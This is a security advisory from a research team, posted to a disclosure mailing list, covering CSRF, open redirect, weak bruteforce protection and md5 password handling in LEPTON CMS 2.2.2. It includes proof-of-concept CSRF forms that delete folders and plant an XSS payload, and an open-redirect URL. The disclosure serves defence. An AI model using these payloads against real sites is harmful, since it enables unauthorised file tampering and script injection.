Lepton 2.2.2: CSRF, Open Redirect, Insecure Bruteforce Protection & Password Handling

["Curesec Research Team (CRT)" <crt () curesec com>]

Security Advisory - Curesec Research Team

1. Introduction

Affected Product: LEPTON 2.2.2 stable
Fixed in:         2.3.0
Fixed Version     http://www.lepton-cms.org/posts/
Link:             important-lepton-2.3.0-101.php
Vendor Website:   http://www.lepton-cms.org/
Vulnerability     CSRF, Open Redirect, Insecure Bruteforce Protection &
Type:             Password Handling
Remote            Yes
Exploitable:
Reported to       09/05/2016
vendor:
Disclosed to      11/10/2016
public:
Release mode:     Coordinated Release
CVE:              n/a
Credits           Tim Coen of Curesec GmbH

2. Overview

Lepton is a content management system written in PHP. In version 2.2.2, it
contains various low to medium impact issues. The functionality that operates
on files and folders is vulnerable to CSRF which may lead to XSS, the logout is
vulnerable to Open Redirect, the in-build bruteforce protection can be easily
bypassed, and passwords are hashed with md5 and send out via email in
plaintext.

3. Details

CSRF

CVSS: Medium 4.0 AV:N/AC:H/Au:N/C:N/I:P/A:P

Description: All actions on folders and files are missing CSRF protection.
Because of this, an attacker can delete, create, or rename folders and files.
An attacker could for example create .html files which would lead to an XSS
attack.

Proof of Concept:

Delete Folder: <html> <body> <form action="http://localhost//
LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/tiny_mce/filemanager/execute.php?
action=delete_folder" method="POST"> <input type="hidden" name="path" value=
"test>" /> <input type="hidden" name="name" value="" /> <input type="submit"
value="Submit request" /> </form> </body> </html> Create File: <html> <body>
<form action="http://localhost//LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/
tiny_mce/filemanager/execute.php?action=create_file" method="POST"> <input type
="hidden" name="path" value="" /> <input type="hidden" name="name" value=
"test.html" /> <input type="hidden" name="new_content" value="<img src=no
onerror=alert(1)>" /> <input type="submit" value="Submit request" /> </form> </
body> </html>

Open Redirect

CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:NP

Description: The redirect parameter of the logout script is vulnerable to open
redirect.

Proof of Concept:

http://localhost/LEPTON_stable_2.2.2/upload/account/logout.php?redirect=http://
google.com

Insufficient Bruteforce Protection

Description: The bruteforce protection works on a per-session base, which is
easily bypassed by an attacker by simply requesting a new session by not
sending the current, locked session information. The current bruteforce
protection may provide a false sense of security and should thus be removed or
changed.

Code:

if($_SESSION['ATTEMPS'] > $this->max_attemps) { $this->warn(); }

Password Handling

The password reset functionality sends a newly generated password in plaintext
via email, which is not recommended.

Additionally, md5 is used for hashing, which is also not recommended.

4. Solution

To mitigate this issue please upgrade at least to version 2.3.0:

http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php

Please note that a newer version might already be available.

5. Report Timeline

09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public


Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-CSRF-Open-Redirect-Insecure-Bruteforce-Protection-amp-Password-Handling-172.html
 
--
blog:  https://www.curesec.com/blog
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/